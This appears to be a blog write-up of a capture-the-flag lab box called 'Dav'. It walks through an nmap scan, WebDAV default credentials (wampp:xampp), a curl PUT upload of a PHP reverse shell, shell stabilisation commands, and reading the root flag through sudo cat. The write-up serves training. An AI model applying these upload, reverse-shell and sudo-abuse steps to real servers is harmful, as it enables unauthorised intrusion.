Post

Dav

Dav

Dav

1
2
3
4
5
6
7
8
9
10
 nmap -sS -sV -sC -p- 10.80.153.92
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-22 07:19 UTC
Nmap scan report for ip-10-80-153-92.eu-west-1.compute.internal (10.80.153.92)
Host is up (0.00021s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

πŸ” Port Discovery & WebDAV Enumeration

πŸ•΅οΈ After the nmap scan, I ran Feroxbuster: Pasted image 20260622131347.png

πŸ’» It shows WebDAV is running: Pasted image 20260622131424.png

We need a password. I searched for default credentials: Pasted image 20260622131753.png I found them, and they worked: Pasted image 20260622131822.png We got a hash: Pasted image 20260622132215.png

πŸ•΅οΈ WebDAV Exploitation

πŸ’‘ I referred to WebDAV attack resources: https://www.drakeaxelrod.com/notes/network/webdav-attacks Pasted image 20260622132246.png We verified that PHP execution works: Pasted image 20260622132303.png

Let’s put the hash aside for a moment and try a reverse shell:

1
curl -I -X PUT http://10.80.153.92/webdav/shell.php --data-binary @r.php -u wampp:xampp

⚑ I uploaded a PHP reverse shell and successfully connected back: Pasted image 20260622132710.png

1
2
3
4
python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm
^Z
stty raw -echo; fg

⚑ Privilege Escalation

πŸ“Œ I ran these commands to stabilize the shell and retrieved the user flag: Pasted image 20260622132928.png

I ran sudo -l to check our privileges. Since we can run cat with sudo, I read the root flag directly from /root/root.txt: Pasted image 20260622133325.png

🏁 It felt like a quick shortcut, but it worked!

This post is licensed under CC BY 4.0 by the author.